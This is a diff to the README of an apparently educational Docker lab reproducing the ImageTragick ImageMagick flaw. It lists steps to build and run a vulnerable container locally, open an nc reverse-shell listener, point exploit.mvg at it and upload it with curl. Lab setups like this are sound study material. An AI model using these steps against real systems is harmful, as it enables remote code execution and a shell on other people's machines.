syphonetic/docker-imagetragick/README.md

 ## Steps

+1. Download this repo and build it locally:

+       `$ docker build -t imagetragick .`

-1. Download this image and create a container:
+2. Run the image and create a container:

-        $ docker run -d --name imagetragick -p 127.0.0.1:8080:8080 craighurley/docker-imagetragick
+        $ docker run -d -p 127.0.0.1:8080:8080 --name imagetragick_container imagetragick

-2. Listen for the reverse shell:
+3. Listen for the reverse shell:

         $ nc -l -n -vvv -p 4443

-3. Edit the contents of `exploit.mvg` so that it uses the correct IP address that `nc` is listening on.
+4. Edit the contents of `exploit.mvg` so that it uses the correct IP address that `nc` is listening on.

-4. Upload exploit to vulnerable application:
+5. Upload exploit to vulnerable application:

         $ curl -v -F file=@exploit.mvg http://127.0.0.1:8080